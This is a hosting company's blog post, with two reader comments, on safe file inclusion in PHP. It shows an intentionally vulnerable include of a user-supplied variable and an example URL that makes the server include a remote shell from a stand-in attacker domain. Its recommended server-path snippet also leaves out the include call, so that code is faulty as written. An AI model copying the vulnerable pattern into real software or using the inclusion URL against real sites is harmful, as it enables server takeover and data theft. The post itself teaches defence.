PHP Security and YOU – Including files the right way

As a web host we fight the battle against hackers and bad code on a daily basis. So HostNexus is looking to encourage clients to use file inclusion within PHP in a more security conscious and safe manner.

Including files with PHP is a common practice and most usage comes in 2 forms. These are including internal files from your own domain and including files from remote (external) sources. This looks something like:

Internal:

< ?php
   include("http://www.myowndomain.com/something.txt");
?>

External:

< ?php
   include("http://www.externaldomain.com/something.txt");
?>

Both are valid syntax in the PHP world but there are two main problems we see on the servers. Sometimes when you include a file using the the URL of your local domain you can cause a PHP loop that initiates endless HTTP requests which causes server load issues and even a server crash due to the load. If you want to include files from your local domain you just need to use the server path instead:

< ?php
   ('/home/httpd/vhosts/myowndomain.com/httpdocs/something.txt');
?>

And now onto using include() for calling external files:

< ?php
   include("http://www.externaldomain.com/something.txt");
?>

The main problem with include() is that runs everything through the PHP parser and evaluates code. The main problem comes from setting a variable for include() which can be easily exploited. Here is an example of code in an index.php:

< ?php
    echo "<html>\n";
    echo "  <body>\n";
    include("$go");
    echo "  </body>\n";
    echo "\n";
?>

The $go variable above is easily exploited like:

http://myowndomain.com/index.php?go=http://www.hackerdomain.com/shell.txt

The hacker can now execute commands on your files, installing phishing sites, sending spam and stealing data.

If you want to include files from remote domains use PHP’s readfile() function instead:

http://www.php.net/manual/en/function.readfile.php

While not 100% secure it still provides more protection as readfile() simply outputs data to a browser rather than parsing everything as PHP.

We’d love to enforce the two practices above but we also understand not everyone is happy modifying code. However, if you know you use includes and have even a simple understanding of these fuctions then please do revisit your code and help yourself to secure your data and server.

Laurence

Share This

About the author

Laurence

Hi, my name is Laurence and I’m a web hosting aficionado. When I'm not cracking the whip at HN I can be found at the gym where I'm chasing that 500lb deadlift and kickboxing with guys half my age and still giving as good as I get. Yep, a rare breed of tech nerd mixed in with meathead.

    View all articles by Laurence

    2 comments

    1. Alex

      The best solution is not to include remote files. I mean why would someone do that?

      If you really need to include a file from a remote host, like you said, you can read the file then parse the need coded yourself instead of blindly executing it.

    2. Robert Spriggs

      I’m with Alex as to why should you ever “include” a remote file. I don’t think I’ve ever done it – or if I did, it was when I was more naiave (however you spell it ).

      A simple rule is if you get something from a remote server use CURL. Always. Then parse and understand the contents before doing what you need.

      A small side-note. It’s amazing how few developers actually know what readfile() does. It’s one of my interview questions for senior PHP developers – can you explain the difference between readfile(), include(), include_once(), require() and require_once(). It has only once (in a lot of interviews) been answered correctly. Only once. Most poeple get it confused with get_file_contents().

      Also never eval() remote or uncensored code. That’s inviting danger even more than including remote files.

      Look after the shared servers 😉

    Leave a Reply

    Your email address will not be published. Required fields are marked *